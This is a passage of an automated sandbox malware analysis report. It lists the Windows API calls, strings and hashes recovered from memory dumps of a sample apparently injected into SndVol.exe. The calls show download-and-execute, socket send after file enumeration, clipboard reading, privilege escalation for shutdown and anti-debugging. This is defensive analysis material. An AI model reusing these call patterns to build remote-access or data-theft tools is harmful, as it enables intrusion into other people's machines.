                                                                • Source File: 00000003.00000002.4408277877.0000000000400000.00000040.00001000.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                • Associated: 00000003.00000002.4408277877.0000000000474000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                • Associated: 00000003.00000002.4408277877.0000000000478000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_3_2_400000_SndVol.jbxd
                                                                Yara matches
                                                                Similarity
                                                                • API ID: ProcessToken$AdjustCurrentErrorLastLookupOpenPrivilegePrivilegesValue
                                                                • String ID: SeShutdownPrivilege
                                                                • API String ID: 3534403312-3733053543
                                                                • Opcode ID: 57e92913f0a9f4d9b3a8183d8d88438ae359a92b07d5b7f7122e8f665953110d
                                                                • Instruction ID: b599e5caaba2c857c5a7044ea86e3d1b9a306509f9612008a7a3a71442eb1233
                                                                • Opcode Fuzzy Hash: 57e92913f0a9f4d9b3a8183d8d88438ae359a92b07d5b7f7122e8f665953110d
                                                                • Instruction Fuzzy Hash: 1EF03AB1801229FBDB109BA0EC4DEEF7FBCEF05612F100461B809A1092D7388E04CAB5
                                                                APIs
                                                                • __EH_prolog.LIBCMT ref: 00409258
                                                                  • Part of subcall function 004048C8: connect.WS2_32(FFFFFFFF,034A5460,00000010), ref: 004048E0
                                                                  • Part of subcall function 00404AA1: send.WS2_32(FFFFFFFF,00000000,00000000,00000000), ref: 00404B36
                                                                • __CxxThrowException@8.LIBVCRUNTIME ref: 004092F4
                                                                • FindFirstFileW.KERNEL32(00000000,?,?,?,00000064), ref: 00409352
                                                                • FindNextFileW.KERNEL32(00000000,?), ref: 004093AA
                                                                • FindClose.KERNEL32(00000000), ref: 004093C1
                                                                  • Part of subcall function 00404E26: WaitForSingleObject.KERNEL32(?,000000FF,?,?,?,00000000,?,004051C0,?,?,?,00405159), ref: 00404E38
                                                                  • Part of subcall function 00404E26: SetEvent.KERNEL32(?,?,?,?,00000000,?,004051C0,?,?,?,00405159), ref: 00404E43
                                                                  • Part of subcall function 00404E26: FindCloseChangeNotification.KERNEL32(?,?,?,?,00000000,?,004051C0,?,?,?,00405159), ref: 00404E4C
                                                                • FindClose.KERNEL32(00000000), ref: 004095B9
                                                                  • Part of subcall function 00404AA1: WaitForSingleObject.KERNEL32(00000000,00000000,0040547D,?,?,00000004,?,?,00000004,?,00474EF8,?), ref: 00404B47
                                                                  • Part of subcall function 00404AA1: SetEvent.KERNEL32(00000000,?,?,00000004,?,?,00000004,?,00474EF8,?,?,?,?,?,?,0040547D), ref: 00404B75
                                                                Memory Dump Source
                                                                • Source File: 00000003.00000002.4408277877.0000000000400000.00000040.00001000.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                • Associated: 00000003.00000002.4408277877.0000000000474000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                • Associated: 00000003.00000002.4408277877.0000000000478000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_3_2_400000_SndVol.jbxd
                                                                Yara matches
                                                                Similarity
                                                                • API ID: Find$Close$EventFileObjectSingleWait$ChangeException@8FirstH_prologNextNotificationThrowconnectsend
                                                                • String ID:
                                                                • API String ID: 2435342581-0
                                                                • Opcode ID: b872af409f18d4e2bb7bbba0f0478c6e37307eeb8e5c6a27a813a89ef4a7cb37
                                                                • Instruction ID: 125c9cc0036adb3739497efb01147483584b5989e706bb19fe9a4109aadf0594
                                                                • Opcode Fuzzy Hash: b872af409f18d4e2bb7bbba0f0478c6e37307eeb8e5c6a27a813a89ef4a7cb37
                                                                • Instruction Fuzzy Hash: DCB18D32900109AACB14EBA1DD96AED7779AF04318F10417FF506B60E2EF785E49CB98
                                                                APIs
                                                                • OpenSCManagerW.ADVAPI32(00000000,00000000,00000010,00000000,00000001,?,0041A6A0,00000000), ref: 0041AA53
                                                                • OpenServiceW.ADVAPI32(00000000,00000000,00000010,?,0041A6A0,00000000), ref: 0041AA68
                                                                • CloseServiceHandle.ADVAPI32(00000000,?,0041A6A0,00000000), ref: 0041AA75
                                                                • StartServiceW.ADVAPI32(00000000,00000000,00000000,?,0041A6A0,00000000), ref: 0041AA80
                                                                • CloseServiceHandle.ADVAPI32(00000000,?,0041A6A0,00000000), ref: 0041AA92
                                                                • CloseServiceHandle.ADVAPI32(00000000,?,0041A6A0,00000000), ref: 0041AA95
                                                                Memory Dump Source
                                                                • Source File: 00000003.00000002.4408277877.0000000000400000.00000040.00001000.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                • Associated: 00000003.00000002.4408277877.0000000000474000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                • Associated: 00000003.00000002.4408277877.0000000000478000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_3_2_400000_SndVol.jbxd
                                                                Yara matches
                                                                Similarity
                                                                • API ID: Service$CloseHandle$Open$ManagerStart
                                                                • String ID:
                                                                • API String ID: 276877138-0
                                                                • Opcode ID: 55aea4e01c19578bfbdca94b163ddb40001bd342cd849d2c6829f49351802c7e
                                                                • Instruction ID: 9fefcdd13c5f6832e1e8d6374d810b05479d45f16fba084c356bea358aebaaee
                                                                • Opcode Fuzzy Hash: 55aea4e01c19578bfbdca94b163ddb40001bd342cd849d2c6829f49351802c7e
                                                                • Instruction Fuzzy Hash: FCF08971101325AFD2119B619C88DFF2B6CDF85BA6B00082AF945921919B68CD49E9B9
                                                                APIs
                                                                  • Part of subcall function 00448215: GetLastError.KERNEL32(00000020,?,0043A7F5,?,?,?,0043F9A8,?,?,00000020,00000000,?,?,?,0042DD01,0000003B), ref: 00448219
                                                                  • Part of subcall function 00448215: _free.LIBCMT ref: 0044824C
                                                                  • Part of subcall function 00448215: SetLastError.KERNEL32(00000000,0043F9A8,?,?,00000020,00000000,?,?,?,0042DD01,0000003B,?,00000041,00000000,00000000), ref: 0044828D
                                                                  • Part of subcall function 00448215: _abort.LIBCMT ref: 00448293
                                                                • IsValidCodePage.KERNEL32(00000000,?,?,?,?,?,?,00444A73,?,?,?,?,004444CA,?,00000004), ref: 00451DBA
                                                                • _wcschr.LIBVCRUNTIME ref: 00451E4A
                                                                • _wcschr.LIBVCRUNTIME ref: 00451E58
                                                                • GetLocaleInfoW.KERNEL32(00000000,?,?,00000078,sJD,00000000,?), ref: 00451EFB
                                                                Strings
                                                                Memory Dump Source
                                                                • Source File: 00000003.00000002.4408277877.0000000000400000.00000040.00001000.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                • Associated: 00000003.00000002.4408277877.0000000000474000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                • Associated: 00000003.00000002.4408277877.0000000000478000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_3_2_400000_SndVol.jbxd
                                                                Yara matches
                                                                Similarity
                                                                • API ID: ErrorLast_wcschr$CodeInfoLocalePageValid_abort_free
                                                                • String ID: sJD
                                                                • API String ID: 4212172061-3536923933
                                                                • Opcode ID: 7ea90a810ccb8eded513053f15f94d45dc96679ac5d2c45bddb92c1ff4a69e8d
                                                                • Instruction ID: 601d6103ecad0283333aca7e4f79148897faf6e4cefa34abd84194fcdbd45a0d
                                                                • Opcode Fuzzy Hash: 7ea90a810ccb8eded513053f15f94d45dc96679ac5d2c45bddb92c1ff4a69e8d
                                                                • Instruction Fuzzy Hash: ED61FA35500606AAE724AB75CC86BBB73A8EF04316F14046FFD05D7292EB78ED48C769
                                                                APIs
                                                                • FindFirstFileW.KERNEL32(00000000,?,?,?,00000000), ref: 05358524
                                                                • FindNextFileW.KERNEL32(00000000,?,?,?,00000000), ref: 053585EC
                                                                  • Part of subcall function 0535576E: send.WS2_32(?,00000000,00000000,00000000), ref: 05355803
                                                                Strings
                                                                Memory Dump Source
                                                                • Source File: 00000003.00000002.4408997863.0000000005350000.00000040.00000400.00020000.00000000.sdmp, Offset: 05350000, based on PE: true
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_3_2_5350000_SndVol.jbxd
                                                                Yara matches
                                                                Similarity
                                                                • API ID: FileFind$FirstNextsend
                                                                • String ID: (eF$XPG$XPG
                                                                • API String ID: 4113138495-1496965907
                                                                • Opcode ID: da2a088c2c47bfc86c5ef0d10107ac4426fe09f0bf14043eaa07d8cc52736815
                                                                • Instruction ID: e9dd5fd275ad97ad3b9b33ea445ed4d9f99ff40ea1622d1af0ccbd1d8fb39cbf
                                                                • Opcode Fuzzy Hash: da2a088c2c47bfc86c5ef0d10107ac4426fe09f0bf14043eaa07d8cc52736815
                                                                • Instruction Fuzzy Hash: 962150362042449BC714FB60DC98DEFB7A8AF95360F405D29BD9653090EF74AA4D8A52
                                                                APIs
                                                                • GetLocaleInfoW.KERNEL32(FDE8FE81,2000000B,00000000,00000002,00000000,?,?,?,053A3428,?,00000000), ref: 053A31A2
                                                                • GetLocaleInfoW.KERNEL32(FDE8FE81,20001004,00000000,00000002,00000000,?,?,?,053A3428,?,00000000), ref: 053A31CB
                                                                • GetACP.KERNEL32(?,?,053A3428,?,00000000), ref: 053A31E0
                                                                Strings
                                                                Memory Dump Source
                                                                • Source File: 00000003.00000002.4408997863.0000000005350000.00000040.00000400.00020000.00000000.sdmp, Offset: 05350000, based on PE: true
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_3_2_5350000_SndVol.jbxd
                                                                Yara matches
                                                                Similarity
                                                                • API ID: InfoLocale
                                                                • String ID: ACP$OCP
                                                                • API String ID: 2299586839-711371036
                                                                • Opcode ID: 996ac876140471f7f335f389899e539d753f319036e5aa489baf53db5bb263cf
                                                                • Instruction ID: e9c9881654270ab3a2f52d7f1e3db2a7bf4e77721bebd6f7969457d8ecf6f3ae
                                                                • Opcode Fuzzy Hash: 996ac876140471f7f335f389899e539d753f319036e5aa489baf53db5bb263cf
                                                                • Instruction Fuzzy Hash: 9E216033B04204AADB35AF54D901EBBB7ABFF44B65B568D64E90AD7210E772DE40C390
                                                                APIs
                                                                • FindResourceA.KERNEL32(SETTINGS,0000000A,00000000), ref: 0041B4B9
                                                                • LoadResource.KERNEL32(00000000,?,?,0040F3DE,00000000), ref: 0041B4CD
                                                                • LockResource.KERNEL32(00000000,?,?,0040F3DE,00000000), ref: 0041B4D4
                                                                • SizeofResource.KERNEL32(00000000,?,?,0040F3DE,00000000), ref: 0041B4E3
                                                                Strings
                                                                Memory Dump Source
                                                                • Source File: 00000003.00000002.4408277877.0000000000400000.00000040.00001000.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                • Associated: 00000003.00000002.4408277877.0000000000474000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                • Associated: 00000003.00000002.4408277877.0000000000478000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_3_2_400000_SndVol.jbxd
                                                                Yara matches
                                                                Similarity
                                                                • API ID: Resource$FindLoadLockSizeof
                                                                • String ID: SETTINGS
                                                                • API String ID: 3473537107-594951305
                                                                • Opcode ID: 572f255012f9d3464d264dba9da87f940f43aba7d13ccaaee0753afa8a381888
                                                                • Instruction ID: 65170a014006dd87783428e4339c5f85687a52ee3761dac8d56b05c0676c202a
                                                                • Opcode Fuzzy Hash: 572f255012f9d3464d264dba9da87f940f43aba7d13ccaaee0753afa8a381888
                                                                • Instruction Fuzzy Hash: 8AE01A36200B22EBEB311BA5AC4CD473E29F7C97637100075F90596232CB798840DAA8
                                                                APIs
                                                                • __EH_prolog.LIBCMT ref: 0040966A
                                                                • FindFirstFileW.KERNEL32(00000000,?,00000000,00000000,?), ref: 004096E2
                                                                • FindNextFileW.KERNEL32(00000000,?), ref: 0040970B
                                                                • FindClose.KERNEL32(000000FF,?,?,?,?,?,?), ref: 00409722
                                                                Memory Dump Source
                                                                • Source File: 00000003.00000002.4408277877.0000000000400000.00000040.00001000.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                • Associated: 00000003.00000002.4408277877.0000000000474000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                • Associated: 00000003.00000002.4408277877.0000000000478000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_3_2_400000_SndVol.jbxd
                                                                Yara matches
                                                                Similarity
                                                                • API ID: Find$File$CloseFirstH_prologNext
                                                                • String ID:
                                                                • API String ID: 1157919129-0
                                                                • Opcode ID: 4a325c590a34807a26d63d289d9f2ec3f664a0255ff010795f7d94bc543c6bf4
                                                                • Instruction ID: bc6583c976318a9931a9d4e75bf6093b5b8d8c817350453c5398c0af4fd679c1
                                                                • Opcode Fuzzy Hash: 4a325c590a34807a26d63d289d9f2ec3f664a0255ff010795f7d94bc543c6bf4
                                                                • Instruction Fuzzy Hash: 59812B329001199BCB15EBA1DC969EDB378AF14318F10417FE506B71E2EF78AE49CB58
                                                                APIs
                                                                • __EH_prolog.LIBCMT ref: 00408811
                                                                • FindFirstFileW.KERNEL32(00000000,?,00466608,00000000,?,?,?,?,?,?,?,?,?,?,?,00000000), ref: 004088CA
                                                                • __CxxThrowException@8.LIBVCRUNTIME ref: 004088F2
                                                                • FindNextFileW.KERNEL32(00000000,?,?,?,?,?,?,?,?,?,?,?,?,00000000), ref: 004088FF
                                                                • FindClose.KERNEL32(00000000,?,?,?,?,?,?,?,?,?,?,?,00000000), ref: 00408A15
                                                                Memory Dump Source
                                                                • Source File: 00000003.00000002.4408277877.0000000000400000.00000040.00001000.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                • Associated: 00000003.00000002.4408277877.0000000000474000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                • Associated: 00000003.00000002.4408277877.0000000000478000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_3_2_400000_SndVol.jbxd
                                                                Yara matches
                                                                Similarity
                                                                • API ID: Find$File$CloseException@8FirstH_prologNextThrow
                                                                • String ID:
                                                                • API String ID: 1771804793-0
                                                                • Opcode ID: 1f04e96db9afbfa1a7863732a19c0559d59836123212e4eec53f64c460cc1fca
                                                                • Instruction ID: 1e810be39857a3d86828f92fa26e793a4655b35e172fafea17edde612d57cc14
                                                                • Opcode Fuzzy Hash: 1f04e96db9afbfa1a7863732a19c0559d59836123212e4eec53f64c460cc1fca
                                                                • Instruction Fuzzy Hash: 16515F72900209AACF04FB61DD569ED7778AF11308F50417FB946B61E2EF389B48CB99
                                                                APIs
                                                                • GetCurrentProcess.KERNEL32(00000028,?), ref: 0536862C
                                                                • OpenProcessToken.ADVAPI32(00000000), ref: 05368633
                                                                • LookupPrivilegeValueA.ADVAPI32(00000000,0046C7C8,?), ref: 05368645
                                                                • AdjustTokenPrivileges.ADVAPI32(?,00000000,?,00000000,00000000,00000000), ref: 05368664
                                                                • GetLastError.KERNEL32 ref: 0536866A
                                                                Memory Dump Source
                                                                • Source File: 00000003.00000002.4408997863.0000000005350000.00000040.00000400.00020000.00000000.sdmp, Offset: 05350000, based on PE: true
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_3_2_5350000_SndVol.jbxd
                                                                Yara matches
                                                                Similarity
                                                                • API ID: ProcessToken$AdjustCurrentErrorLastLookupOpenPrivilegePrivilegesValue
                                                                • String ID:
                                                                • API String ID: 3534403312-0
                                                                • Opcode ID: 57e92913f0a9f4d9b3a8183d8d88438ae359a92b07d5b7f7122e8f665953110d
                                                                • Instruction ID: b599e5caaba2c857c5a7044ea86e3d1b9a306509f9612008a7a3a71442eb1233
                                                                • Opcode Fuzzy Hash: 57e92913f0a9f4d9b3a8183d8d88438ae359a92b07d5b7f7122e8f665953110d
                                                                • Instruction Fuzzy Hash: 1EF03AB1801229FBDB109BA0EC4DEEF7FBCEF05612F100461B809A1092D7388E04CAB5
                                                                APIs
                                                                • ShellExecuteW.SHELL32(00000000,open,00000000,00000000,00000000,00000001), ref: 00406FBC
                                                                • URLDownloadToFileW.URLMON(00000000,00000000,00000004,00000000,00000000), ref: 004070A0
                                                                Strings
                                                                Memory Dump Source
                                                                • Source File: 00000003.00000002.4408277877.0000000000400000.00000040.00001000.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                • Associated: 00000003.00000002.4408277877.0000000000474000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                • Associated: 00000003.00000002.4408277877.0000000000478000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_3_2_400000_SndVol.jbxd
                                                                Yara matches
                                                                Similarity
                                                                • API ID: DownloadExecuteFileShell
                                                                • String ID: C:\Windows\SysWOW64\SndVol.exe$open
                                                                • API String ID: 2825088817-1291576107
                                                                • Opcode ID: 97dcc9074c153d6f09495311a7514a554f1da2d909d387662c83696290de7d3d
                                                                • Instruction ID: 27a8b34c094a82f854f2ee3e6b31e6014a71d41456184bc7540e3ceb6c1d0c01
                                                                • Opcode Fuzzy Hash: 97dcc9074c153d6f09495311a7514a554f1da2d909d387662c83696290de7d3d
                                                                • Instruction Fuzzy Hash: 6561A171B0830166CA24FB76C8569BE37A59F81748F50093FB942772D2EE3C9905C69B
                                                                APIs
                                                                  • Part of subcall function 0536861F: GetCurrentProcess.KERNEL32(00000028,?), ref: 0536862C
                                                                  • Part of subcall function 0536861F: OpenProcessToken.ADVAPI32(00000000), ref: 05368633
                                                                  • Part of subcall function 0536861F: LookupPrivilegeValueA.ADVAPI32(00000000,0046C7C8,?), ref: 05368645
                                                                  • Part of subcall function 0536861F: AdjustTokenPrivileges.ADVAPI32(?,00000000,?,00000000,00000000,00000000), ref: 05368664
                                                                  • Part of subcall function 0536861F: GetLastError.KERNEL32 ref: 0536866A
                                                                • ExitWindowsEx.USER32(00000000,00000001), ref: 05367523
                                                                • LoadLibraryA.KERNEL32(0046C770,0046C760,00000000,00000000,00000000), ref: 05367538
                                                                • GetProcAddress.KERNEL32(00000000), ref: 0536753F
                                                                Strings
                                                                Memory Dump Source
                                                                • Source File: 00000003.00000002.4408997863.0000000005350000.00000040.00000400.00020000.00000000.sdmp, Offset: 05350000, based on PE: true
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_3_2_5350000_SndVol.jbxd
                                                                Yara matches
                                                                Similarity
                                                                • API ID: ProcessToken$AddressAdjustCurrentErrorExitLastLibraryLoadLookupOpenPrivilegePrivilegesProcValueWindows
                                                                • String ID: !D@
                                                                • API String ID: 1589313981-604454484
                                                                • Opcode ID: 518a98aa8e33dee1c4de961979bab0d7f2b6bdf321556802f5344010ded5f568
                                                                • Instruction ID: 50165a048092e737e189e6e4e1dd888b7a3f44149752499d8856fcb2f88817c9
                                                                • Opcode Fuzzy Hash: 518a98aa8e33dee1c4de961979bab0d7f2b6bdf321556802f5344010ded5f568
                                                                • Instruction Fuzzy Hash: F421A664744305A7CE14FFB0889DDBF2259EFA1354F809D2D7A4297582EFA4CC068A66
                                                                APIs
                                                                • SystemParametersInfoW.USER32(00000014,00000000,00000000,00000003), ref: 0041CAD7
                                                                  • Part of subcall function 0041376F: RegCreateKeyA.ADVAPI32(80000001,00000000,?), ref: 0041377E
                                                                  • Part of subcall function 0041376F: RegSetValueExA.KERNEL32(?,004674B8,00000000,?,00000000,00000000,004752F0,?,?,0040F853,004674B8,4.9.4 Pro), ref: 004137A6
                                                                  • Part of subcall function 0041376F: RegCloseKey.KERNEL32(?,?,?,0040F853,004674B8,4.9.4 Pro), ref: 004137B1
                                                                Strings
                                                                Memory Dump Source
                                                                • Source File: 00000003.00000002.4408277877.0000000000400000.00000040.00001000.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                • Associated: 00000003.00000002.4408277877.0000000000474000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                • Associated: 00000003.00000002.4408277877.0000000000478000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_3_2_400000_SndVol.jbxd
                                                                Yara matches
                                                                Similarity
                                                                • API ID: CloseCreateInfoParametersSystemValue
                                                                • String ID: Control Panel\Desktop$TileWallpaper$WallpaperStyle
                                                                • API String ID: 4127273184-3576401099
                                                                • Opcode ID: 4f71dd23c4f760eabc23ec2adbc3392ecf1bb7076945bb966ce08e22b16a15c0
                                                                • Instruction ID: 1197cbbb31bb874c57b9e92d70abebba424d259215afdbf251ae70ffa4d9d73d
                                                                • Opcode Fuzzy Hash: 4f71dd23c4f760eabc23ec2adbc3392ecf1bb7076945bb966ce08e22b16a15c0
                                                                • Instruction Fuzzy Hash: 7B1184B2BC021473D419313E5DABBBE28029743B51F94416BF6123A6C6E8DF0A8102CF
                                                                APIs
                                                                  • Part of subcall function 05364216: RegOpenKeyExA.ADVAPI32(80000001,00000000,00000000,00020019,00000000,00000000), ref: 05364236
                                                                  • Part of subcall function 05364216: RegQueryValueExA.ADVAPI32(00000000,?,00000000,?,?,?), ref: 05364254
                                                                  • Part of subcall function 05364216: RegCloseKey.ADVAPI32(00000000), ref: 0536425F
                                                                • Sleep.KERNEL32(00000BB8), ref: 05360528
                                                                • ExitProcess.KERNEL32 ref: 05360597
                                                                Strings
                                                                Memory Dump Source
                                                                • Source File: 00000003.00000002.4408997863.0000000005350000.00000040.00000400.00020000.00000000.sdmp, Offset: 05350000, based on PE: true
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_3_2_5350000_SndVol.jbxd
                                                                Yara matches
                                                                Similarity
                                                                • API ID: CloseExitOpenProcessQuerySleepValue
                                                                • String ID: pth_unenc
                                                                • API String ID: 2281282204-4028850238
                                                                • Opcode ID: 239e53c764d611775cc28217bb96d4133c4679258c828bc8db514802d76be294
                                                                • Instruction ID: 158aca2f796003a12b0aaffb94383f89d1ca41970c6758c7214e04560c57cdef
                                                                • Opcode Fuzzy Hash: 239e53c764d611775cc28217bb96d4133c4679258c828bc8db514802d76be294
                                                                • Instruction Fuzzy Hash: 5321D665F5420067CA18BA754C9EE7F3999AB81620F90951CF806572C9FE689D0087EB
                                                                APIs
                                                                • IsDebuggerPresent.KERNEL32 ref: 0043BC1A
                                                                • SetUnhandledExceptionFilter.KERNEL32(00000000), ref: 0043BC24
                                                                • UnhandledExceptionFilter.KERNEL32(?), ref: 0043BC31
                                                                Memory Dump Source
                                                                • Source File: 00000003.00000002.4408277877.0000000000400000.00000040.00001000.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                • Associated: 00000003.00000002.4408277877.0000000000474000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                • Associated: 00000003.00000002.4408277877.0000000000478000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_3_2_400000_SndVol.jbxd
                                                                Yara matches
                                                                Similarity
                                                                • API ID: ExceptionFilterUnhandled$DebuggerPresent
                                                                • String ID:
                                                                • API String ID: 3906539128-0
                                                                • Opcode ID: a72bbe9f24da65e63e608425843f2cf14cbf2294963ef3e60e5c7cfd459546ed
                                                                • Instruction ID: cbfc558a7ca4bb69983b526de44ffd1abc81b2e56a4044740c9350c1ecaeaada
                                                                • Opcode Fuzzy Hash: a72bbe9f24da65e63e608425843f2cf14cbf2294963ef3e60e5c7cfd459546ed
                                                                • Instruction Fuzzy Hash: E131C27590121DABCB21DF65DD89BCDBBB8AF08311F5051EAE80CA6251EB349F858F48
                                                                APIs
                                                                • IsDebuggerPresent.KERNEL32 ref: 0538C8E7
                                                                • SetUnhandledExceptionFilter.KERNEL32(00000000), ref: 0538C8F1
                                                                • UnhandledExceptionFilter.KERNEL32(?), ref: 0538C8FE
                                                                Memory Dump Source
                                                                • Source File: 00000003.00000002.4408997863.0000000005350000.00000040.00000400.00020000.00000000.sdmp, Offset: 05350000, based on PE: true
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_3_2_5350000_SndVol.jbxd
                                                                Yara matches
                                                                Similarity
                                                                • API ID: ExceptionFilterUnhandled$DebuggerPresent
                                                                • String ID:
                                                                • API String ID: 3906539128-0
                                                                • Opcode ID: a72bbe9f24da65e63e608425843f2cf14cbf2294963ef3e60e5c7cfd459546ed
                                                                • Instruction ID: d47d79f562cc6b1c08256c57aadc88507c45152b90ea9791e4c5e37a52795e3b
                                                                • Opcode Fuzzy Hash: a72bbe9f24da65e63e608425843f2cf14cbf2294963ef3e60e5c7cfd459546ed
                                                                • Instruction Fuzzy Hash: FD31B2B590131CABCB25EF65D888B9CBBB8BF08750F5041EAE81CA7251E7749F818F54
                                                                APIs
                                                                • CryptAcquireContextA.ADVAPI32(00000000,00000000,00000000,00000001,F0000000,?,00000000,004334BF,00000034,?,?,00000000), ref: 00433849
                                                                • CryptGenRandom.ADVAPI32(00000000,?,?,?,?,?,?,?,?,?,?,?,00433552,00000000,?,00000000), ref: 0043385F
                                                                • CryptReleaseContext.ADVAPI32(00000000,00000000,?,?,?,?,?,?,?,?,?,00433552,00000000,?,00000000,0041E251), ref: 00433871
                                                                Memory Dump Source
                                                                • Source File: 00000003.00000002.4408277877.0000000000400000.00000040.00001000.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                • Associated: 00000003.00000002.4408277877.0000000000474000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                • Associated: 00000003.00000002.4408277877.0000000000478000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_3_2_400000_SndVol.jbxd
                                                                Yara matches
                                                                Similarity
                                                                • API ID: Crypt$Context$AcquireRandomRelease
                                                                • String ID:
                                                                • API String ID: 1815803762-0
                                                                • Opcode ID: 81ae4bbc27a0383ddd18646ed4cc5f88ed8aa0b0f15284250c3048956b898281
                                                                • Instruction ID: 864202151b2ab8ebdb17250bb7e2999cce5b6c404a207f59f2405eb254ca80c1
                                                                • Opcode Fuzzy Hash: 81ae4bbc27a0383ddd18646ed4cc5f88ed8aa0b0f15284250c3048956b898281
                                                                • Instruction Fuzzy Hash: 83E09231308310FAFB341F25AC08F573AA5EB89B67F20093AF211E40E4D2568C018A5C
                                                                APIs
                                                                • CryptAcquireContextA.ADVAPI32(?,00000000,00000000,00000001,F0000000,?,?,0538418C,00000034,?,?,00472AE0), ref: 05384516
                                                                • CryptGenRandom.ADVAPI32(?,?,?,?,?,?,?,?,?,?,?,PkGNG,0538421F,?,?,?), ref: 0538452C
                                                                • CryptReleaseContext.ADVAPI32(?,00000000,?,?,?,?,?,?,?,?,PkGNG,0538421F,?,?,?,0536EF1E), ref: 0538453E
                                                                Memory Dump Source
                                                                • Source File: 00000003.00000002.4408997863.0000000005350000.00000040.00000400.00020000.00000000.sdmp, Offset: 05350000, based on PE: true
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_3_2_5350000_SndVol.jbxd
                                                                Yara matches
                                                                Similarity
                                                                • API ID: Crypt$Context$AcquireRandomRelease
                                                                • String ID:
                                                                • API String ID: 1815803762-0
                                                                • Opcode ID: 81ae4bbc27a0383ddd18646ed4cc5f88ed8aa0b0f15284250c3048956b898281
                                                                • Instruction ID: 734a89771824bf54d6bae675e23cf1758d9e2267f136732c1fd2db815542049a
                                                                • Opcode Fuzzy Hash: 81ae4bbc27a0383ddd18646ed4cc5f88ed8aa0b0f15284250c3048956b898281
                                                                • Instruction Fuzzy Hash: 07E09231208311FAEF345F21BC08F7B3A6AEB85B6AF600939F211E54E4E29289048518
                                                                APIs
                                                                • OpenClipboard.USER32(00000000), ref: 0040B711
                                                                • GetClipboardData.USER32(0000000D), ref: 0040B71D
                                                                • CloseClipboard.USER32 ref: 0040B725
                                                                Memory Dump Source
                                                                • Source File: 00000003.00000002.4408277877.0000000000400000.00000040.00001000.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                • Associated: 00000003.00000002.4408277877.0000000000474000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                • Associated: 00000003.00000002.4408277877.0000000000478000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_3_2_400000_SndVol.jbxd
                                                                Yara matches
                                                                Similarity
                                                                • API ID: Clipboard$CloseDataOpen
                                                                • String ID:
                                                                • API String ID: 2058664381-0
                                                                • Opcode ID: d38c0863fa6e1407ff7c70a07519499014c38180332fc89bd075bae9f751f2b8
                                                                • Instruction ID: a9752f6e69e3a39ef1c6dae57fb9473311d117e3f10fa11c4aa70225693e5904
                                                                • Opcode Fuzzy Hash: d38c0863fa6e1407ff7c70a07519499014c38180332fc89bd075bae9f751f2b8
                                                                • Instruction Fuzzy Hash: 4FE0EC31645320EFC2209B609C49B9A6754DF95F52F41843AB905AB2D5DB78CC40C6AD
                                                                APIs
                                                                • SystemParametersInfoW.USER32(00000014,00000000,00000000,00000003), ref: 0536D7A4
                                                                  • Part of subcall function 0536443C: RegCreateKeyA.ADVAPI32(80000001,Control Panel\Desktop,0046611C), ref: 0536444B
                                                                  • Part of subcall function 0536443C: RegSetValueExA.ADVAPI32(0046611C,0046CBB8,00000000,?,00000000,00000000,Control Panel\Desktop,?,?,0536D77E,0046CBB8,0046611C,00000001,00474EE0,00000000), ref: 05364473
                                                                  • Part of subcall function 0536443C: RegCloseKey.ADVAPI32(0046611C,?,?,0536D77E,0046CBB8,0046611C,00000001,00474EE0,00000000,?,0535942A,00000001), ref: 0536447E
                                                                Strings
                                                                Memory Dump Source
